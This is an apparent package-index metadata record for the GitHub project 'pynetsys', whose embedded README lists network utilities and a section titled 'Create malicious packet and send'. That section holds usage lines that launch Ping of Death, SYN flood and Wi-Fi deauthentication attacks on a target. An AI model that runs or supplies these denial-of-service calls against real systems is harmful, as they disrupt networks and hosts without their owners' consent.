{"id":24062140,"url":"https://github.com/andrvv/pynetsys","last_synced_at":"2026-06-10T02:31:18.815Z","repository":{"id":42017562,"uuid":"510527885","full_name":"ANDRVV/pynetsys","owner":"ANDRVV","description":"pynetsys is a collection of tools and malicious packets.","archived":false,"fork":false,"pushed_at":"2022-11-02T14:32:44.000Z","size":35,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-02-09T09:46:19.540Z","etag":null,"topics":["hacking","hacking-tools","packets","python"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-3-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ANDRVV.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2022-07-04T23:25:00.000Z","updated_at":"2024-06-09T14:02:02.000Z","dependencies_parsed_at":"2023-01-21T13:15:14.675Z","dependency_job_id":null,"html_url":"https://github.com/ANDRVV/pynetsys","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ANDRVV%2Fpynetsys","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ANDRVV%2Fpynetsys/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ANDRVV%2Fpynetsys/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ANDRVV%2Fpynetsys/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ANDRVV","download_url":"https://codeload.github.com/ANDRVV/pynetsys/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":240884490,"owners_count":19873350,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["hacking","hacking-tools","packets","python"],"created_at":"2025-01-09T08:20:18.214Z","updated_at":"2026-06-10T02:31:18.790Z","avatar_url":"https://github.com/ANDRVV.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# PYNETSYS\n\npynetsys is a collection of tools and malicious packets.\n\nDeveloped by Andrea Vaccaro from ANDRVV (c) 2022\n\n# Installing\n\nLinux, MacOS = ```pip3 install pynetsys --user```\n\nWindows = ```pip install pynetsys --user```\n\n# Tools\n\n```python\nimport pynetsys\n\ntrace = pynetsys.tool.traceroute(\"python.org\") --\u003e list\nprint(trace)\n\narping = pynetsys.tool.arp() --\u003e dict\nprint(arping)\n\nhostinfo = pynetsys.tool.hostlookup(\"python.org\") --\u003e dict\nprint(hostinfo)\n\nnetworks = pynetsys.tool.networkFinder() --\u003e dict\nprint(hostinfo)\n\n----------------\n\nisonline = pynetsys.isOnline(\"python.org\") --\u003e bool\nprint(isonline)\n\nhaswebprotocol = pynetsys.hasWebProtocol(\"http:\\\\python.org\") --\u003e bool\nOR\nhaswebprotocol = pynetsys.hasWebProtocol(\"python.org\") --\u003e bool \nprint(haswebprotocol)\n\nhasSSLwebprotocol = pynetsys.hasSSLWebProtocol(\"https:\\\\python.org\") --\u003e bool\nOR\nhasSSLwebprotocol = pynetsys.hasSSLWebProtocol(\"python.org\") --\u003e bool \nprint(hasSSLwebprotocol)\n\naddwebprotocol = pynetsys.addWebProtocol(\"python.org\") --\u003e str\nprint(addwebprotocol)\n\nremovewebprotocol = pynetsys.removeWebProtocol(\"https:\\\\python.org\") --\u003e str \nOR\nremovewebprotocol = pynetsys.removeWebProtocol(\"http:\\\\python.org\") --\u003e str \nprint(removewebprotocol)\n```\n\n# Create malicious packet and send\n\n```python\nimport pynetsys\n\nPACKET, ID = pynetsys.packet.packet(target = \"example.org\", attack = Packets.DEATH_PING)\npynetsys.packet.start(PACKET, ID, _verbose = 0)\n\nPACKET, ID = pynetsys.packet.packet(target = \"example.org\", attack = Packets.SYN_FLOOD)\npynetsys.packet.start(PACKET, ID, _verbose = 0)\n\nPACKET, ID = pynetsys.packet.packet(target = \"aa:bb:cc:dd:ee:ff\", attack = Packets.WIRELESS_DEAUTH)\npynetsys.packet.start(PACKET, ID, _verbose = 0)\n\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fandrvv%2Fpynetsys","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fandrvv%2Fpynetsys","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fandrvv%2Fpynetsys/lists"}